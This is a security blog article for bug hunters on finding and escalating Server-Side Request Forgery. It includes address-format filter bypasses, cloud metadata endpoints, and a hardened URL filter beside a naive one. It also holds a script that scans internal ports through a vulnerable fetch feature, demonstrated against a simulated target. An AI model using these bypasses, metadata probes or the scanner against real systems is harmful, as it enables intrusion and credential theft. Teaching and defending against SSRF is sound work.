SSRF, Bypasses & Escalation Tips

Understanding Real-World SSRF Vulnerabilities (Assumes Prior Knowledge)
Caveat: This article assumes you're already familiar with Server-Side Request Forgery (SSRF). If not, check out PortSwigger's SSRF Guide first.
Server-Side Request Forgery (SSRF) is a powerful vulnerability — especially when it leads to internal service access or cloud metadata leaks. But real-world SSRF isn’t always obvious. It often hides in features that appear harmless on the surface.
Here’s a quick breakdown of commonly vulnerable features, exploitation tips, and practical advice on navigating defenses.
Common Features Vulnerable to SSRF
Look for any functionality that fetches remote resources — these often expose SSRF:
- URL import features (e.g., fetch PDF from a URL)
- File upload mechanisms (especially when the app fetches file metadata)
- Headless browsers / HTML rendering
- Server monitoring dashboards
- File storage integrations (Dropbox, Google Drive, etc.)
- Path parameters or Host headers used dynamically
- Webhooks
- Open redirect + SSRF chains
- Import/sync functionality
These are not guaranteed SSRF points, but they're excellent places to start.
Key Tips: Finding and Bypassing SSRF Filters
SSRF rarely works on the first try. Many apps have some basic protection. Here are some useful guidelines:
- Server vs. client: Confirm it's the server making the request, not the browser. Point the feature at an out-of-band listener you control (e.g. Burp Collaborator) and check that the callback's source IP belongs to the application, not to your machine. Also note whether the response body is returned to you (full SSRF) or only the side effect is observable (blind SSRF); this decides what you can do with it later.
- Input filters exist: Look out for:
  - IP whitelisting/blacklisting (e.g., blocking `127.0.0.1`)
  - Hostname filtering
  - Basic WAFs
- Bypass techniques:
  - Use alternate IP formats (e.g., decimal `2130706433`, hex `0x7f000001`, octal `0177.0.0.1` or shortened `127.1` for `127.0.0.1`)
  - DNS rebinding: a hostname you control answers with a public IP when the filter resolves it and with an internal IP when the app actually connects. This only works when the check and the fetch resolve the name separately.
  - Use open redirects as intermediaries: a whitelisted domain with an open redirect forwards the server's request to the internal target
  - Try `localhost`, `[::1]`, `0.0.0.0`, etc.
Also note: some firewalls block requests to internal IP ranges, but misconfigured filters can often be bypassed with creative input.
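To show why the bypasses above work, here is an added example (not code from the original article) that puts a typical weak substring filter next to a hardened one. The hardened version parses every numeric host form a libc resolver accepts, resolves real hostnames and rejects anything that is not a globally routable address. The DNS answers (`FAKE_DNS`, `fake_resolve`) and the hostnames in them are constructed so the example runs offline; in a real application you would pass a resolver built on `socket.getaddrinfo`.

```python
"""Naive SSRF host filter beside a hardened one.

Added example, not code from the original article. The resolver below is a
constructed in-memory lookup standing in for DNS so the example runs offline.
"""
import ipaddress
import socket
from typing import Callable, Iterable, Optional, Union
from urllib.parse import urlsplit

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

# Constructed DNS answers (assumption: hypothetical names and addresses).
FAKE_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "internal.corp": ["10.0.0.5"],
    "example.com": ["93.184.216.34"],
}


def fake_resolve(host: str) -> list[str]:
    """Stand-in for socket.getaddrinfo; unknown names resolve to nothing."""
    return FAKE_DNS.get(host, [])


def naive_is_blocked(url: str) -> bool:
    """The kind of filter seen in the wild: substring match on a few literals.
    Decimal/hex/octal IPs, IPv6 literals and 0.0.0.0 sail straight past it."""
    blocked = ("127.0.0.1", "localhost", "169.254.169.254", "10.", "192.168.")
    return any(b in url for b in blocked)


def parse_numeric_host(host: str) -> Optional[IPAddress]:
    """Accept every numeric host form a libc resolver would: dotted quad and
    IPv6 via ipaddress, plus the legacy inet_aton forms such as
    2130706433, 0x7f000001, 0177.0.0.1 and 127.1 (all 127.0.0.1)."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None  # not numeric at all: a real hostname


def is_disallowed(ip: IPAddress) -> bool:
    """Anything that is not a globally routable unicast address."""
    mapped = getattr(ip, "ipv4_mapped", None)  # ::ffff:127.0.0.1 hides an IPv4
    if mapped is not None:
        ip = mapped
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified
            or not ip.is_global)


def hardened_check(url: str,
                   resolve: Callable[[str], Iterable[str]] = fake_resolve
                   ) -> tuple[bool, list[str]]:
    """Return (allowed, resolved_addresses).

    Fails closed: an unknown scheme, an empty host or a name that does not
    resolve is rejected, and every address a name resolves to must be global.
    The caller must then connect to one of the returned addresses (sending the
    original hostname in the Host header) instead of resolving the name again,
    otherwise DNS rebinding reintroduces the bug.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False, []
    literal = parse_numeric_host(parts.hostname)
    if literal is not None:
        addresses = [literal]
    else:
        addresses = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
    if not addresses:
        return False, []
    return all(not is_disallowed(a) for a in addresses), [str(a) for a in addresses]


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1/", "http://2130706433/", "http://0x7f000001/",
                      "http://127.1/", "http://[::1]/", "http://0.0.0.0:8000/",
                      "http://localhost/", "http://internal.corp/admin",
                      "http://example.com/"):
        print(f"{candidate:32} naive_blocked={naive_is_blocked(candidate)!s:5} "
              f"hardened_allowed={hardened_check(candidate)[0]}")
```

Run it as a script to see the naive filter pass `2130706433`, `0x7f000001`, `127.1`, `[::1]` and `0.0.0.0` while the hardened check rejects them. Note the rebinding caveat in `hardened_check`: validating and then letting an HTTP client re-resolve the hostname is exactly the gap the rebinding technique in the list above targets.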
Post-SSRF: Escalation & Impact
Finding SSRF is just the beginning. Your goal should always be to escalate:
- Scan internal ports: Try ports like `22`, `8000`, `5000`, etc. Closed, open and firewalled ports usually give different status codes, error messages or response times, so compare every probe against a port you know is closed.
- Access cloud metadata:
  - AWS: `http://169.254.169.254/latest/meta-data/` (instances that enforce IMDSv2 require a session token fetched with a PUT request and sent back in a header, so a GET-only SSRF gets nothing from them)
  - GCP: `http://metadata.google.internal/` (the `/computeMetadata/v1/` endpoints require the `Metadata-Flavor: Google` request header, so you need an SSRF that lets you control headers)
- Find admin panels:
  - Common paths: `/admin`, `/dashboard`, `/monitor`
  - Internal-only UIs often listen on `localhost` or private IPs
- Chain SSRF with other vulns:
  - SSRF → RCE on internal apps
  - SSRF → Open Redirect → Internal Access
  - SSRF → Sensitive info leak (e.g., credentials, config files)
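The port-scanning step above relies on one idea: the SSRF sink answers differently depending on what it hit. The following added example (not code from the original article) automates that comparison. The target endpoint `https://app.test/fetch`, its `url` parameter and the behaviour in `constructed_fake_fetch` are all constructed assumptions standing in for a real application so the scan runs offline; swap the fake for a function that performs the real HTTP request and returns `(status, body)`.

```python
"""Differential internal port scan through an SSRF sink.

Added example, not code from the original article. The endpoint, parameter
name and responses are constructed; constructed_fake_fetch simulates a target.
"""
import time
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit

Fetch = Callable[[str], Tuple[int, bytes]]  # returns (status code, response body)


@dataclass
class Probe:
    port: int
    status: int
    length: int
    elapsed: float


def build_ssrf_url(target: str, param: str, host: str, port: int, path: str = "/") -> str:
    """URL sent to the vulnerable feature, e.g. .../fetch?url=http%3A%2F%2F127.0.0.1%3A22%2F"""
    return f"{target}?{urlencode({param: f'http://{host}:{port}{path}'})}"


def scan_ports(target: str, param: str, host: str, ports: Iterable[int],
               fetch: Fetch, baseline_port: int = 1) -> Dict[int, Probe]:
    """Probe baseline_port first (assumed closed), then each candidate port,
    recording what the sink gives back: status, body length and latency."""
    probes: Dict[int, Probe] = {}
    for port in [baseline_port, *ports]:
        url = build_ssrf_url(target, param, host, port)
        started = time.perf_counter()
        status, body = fetch(url)
        probes[port] = Probe(port, status, len(body), time.perf_counter() - started)
    return probes


def interesting_ports(probes: Dict[int, Probe], baseline_port: int = 1,
                      slow_factor: float = 3.0, floor: float = 0.05) -> List[int]:
    """Ports whose response differs from the closed-port baseline.
    A different status or length means something answered; a much slower
    reply usually means a firewall dropped the connection attempt."""
    base = probes[baseline_port]
    found = []
    for port, probe in probes.items():
        if port == baseline_port:
            continue
        differs = (probe.status, probe.length) != (base.status, base.length)
        slow = probe.elapsed > slow_factor * max(base.elapsed, floor)
        if differs or slow:
            found.append(port)
    return sorted(found)


def constructed_fake_fetch(url: str) -> Tuple[int, bytes]:
    """Constructed target behaviour (an assumption, not a real application):
    closed ports fail fast, 22 returns a non-HTTP banner error, 8000 serves
    an internal UI, 5000 is firewalled and times out. Reads the 'url' param."""
    inner = parse_qs(urlsplit(url).query)["url"][0]
    port = urlsplit(inner).port
    if port == 22:
        return 502, b"upstream sent an invalid HTTP response"
    if port == 8000:
        return 200, b"<html><title>Internal dashboard</title></html>"
    if port == 5000:
        time.sleep(0.5)
        return 504, b"gateway timeout"
    return 502, b"connection refused"


def demo() -> List[int]:
    probes = scan_ports("https://app.test/fetch", "url", "127.0.0.1",
                        [22, 80, 443, 5000, 8000, 9000], constructed_fake_fetch)
    return interesting_ports(probes)


if __name__ == "__main__":
    for port in demo():
        print(f"port {port} responds differently from the closed-port baseline")
```

Against the constructed target, `demo()` flags 22, 5000 and 8000 and ignores 80, 443 and 9000, which look identical to the baseline. On a real target, keep the baseline port and the scan in the same session and rate-limit the requests: the latency signal is only meaningful when the app is not also slowing down under your own traffic.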
All the best, feel free to connect with me on LinkedIn.
Written by Dekow Mohamed